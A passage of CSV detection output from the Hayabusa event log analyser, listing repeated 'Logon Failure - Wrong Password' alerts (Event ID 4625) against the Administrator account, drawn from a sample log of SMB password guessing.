NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.711 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: irIfGLQdhtRRGwuo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.752 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YCf6WUjiS11hHqKT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.796 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1o0CTT7GsWfCWuHx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.832 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F6Jr8XrUsmTiSdol | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.868 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Buj66iuSkLEQdKnQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.912 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L1wOLI51HqfkgO6r | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.945 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4oe273WXOICzkwW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:53.992 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1c7nGezYNJ70jR6R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.037 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ajuZ09zGeuovCQLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.081 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4k7xV7soNF4mHlz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CtdqW8zOw1GoQcvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
aY6FLi1edRZWrRZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.204 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ah1JoKfxJzQhCCVL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.248 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIMOZRGcv4o33BWd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.276 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmLyLJoVZz6fJ62I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.308 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aGufqEGD4hFf2XLM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.340 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7IEdKy2H5Agblpjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.384 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: XT9k8C05GVLBNPdl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.424 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5opHh8HelCXtR5Cm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.473 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0dntDwYLmag9efo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.514 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQfZOMFV9LtY7r2S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.632 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y01v38dTUIsJEZIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.684 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCP8x2QBZ6IvMEnf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.739 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: hgcbYjw3kKqlK7Di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.774 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TFU97Tq3e7IWvSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.808 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hUCvaS1yM2FU9AE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.852 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8JInVlBqTSfT4J1s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.896 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EjXRQUGDKBZaMkw3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.937 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZPXNxkGOrld5eCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:54.978 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
Wrong Password,User: Administrator | Type: 3 | Computer: OBDhSrF7DZ1KBRa8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.013 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQ7TKJOGibAVNoCH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.054 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZE1GARxx03m4FtEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gf3VLLTxsK85bsrv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.123 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58G6MFVbW55JZIV5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.160 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yxne9LqZCqBf3qkc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.200 
+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ssZya6gArnuepKyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.244 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rsDEj6o0NaKUYPZL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.288 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pELSIsupIYAxPCtv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.330 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: urHCDmdCfNexxUHf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.373 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czGXZFukLquA9Mce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.424 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: icWMY9pKCQMyTxJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-19 16:50:55.464 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v28FLC2WXEXSUiI5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.510 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FwhjHww5iA51SFjp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.552 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 96BwmhKqDIojhdRA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.601 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DiRvofjwoeAdHYrv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.655 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNLdOrPwbvYELiCc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.704 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x15WKTspmg2ALHaY | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.748 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QMoQWddkcYtCmoKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.784 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jhTbfX42Pwn7OA2k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.814 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXcbUCgAhVFfqLc3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.856 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GHyXVM0jpaKBiY9N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.896 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TZoWEcU6VbEnrLpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.939 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LIfEzNQWwvrai4ga | IP Addr: 
192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:55.980 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DhImfqWz7SHId9hE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.014 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6sekQfneNE5uFtx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.068 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iEQ6KkZEHGcSgdA8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.103 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qzxJYBbM7ZMaaGOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.151 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wO5GFBqSltNfjtQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.198 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 
PdsMzjfP1ZcPju2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.232 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LqpKmoCX9slPXie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.284 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ouHvw1LXTN3OSFYb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.320 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tZIB1QO7hfugceJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.364 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4QU2BQ0u5tJsdjG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.404 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0P7NKiKCmLvu6L1L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.440 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | 
Type: 3 | Computer: 4obkK4RfsLZe5gdi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.482 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRUDpDLhgop8d1el | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.530 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LvdsNkFqfFWRePXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.557 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wvd8c1jYrEZMcKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.600 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AWvECxgkvWdg9Zdc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.648 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHHPOAYSMSp3BhX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.692 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: rJicXUMfrx9BOzHI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.788 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eybrQWvrvwSkNADJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.816 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VVMPCaQB0XteDSwC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.861 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lbjjLoATZE6KPIQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.906 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tips954DRcYeIB2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.945 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nLe9aMiMz0akxfWW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:50:56.976 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - 
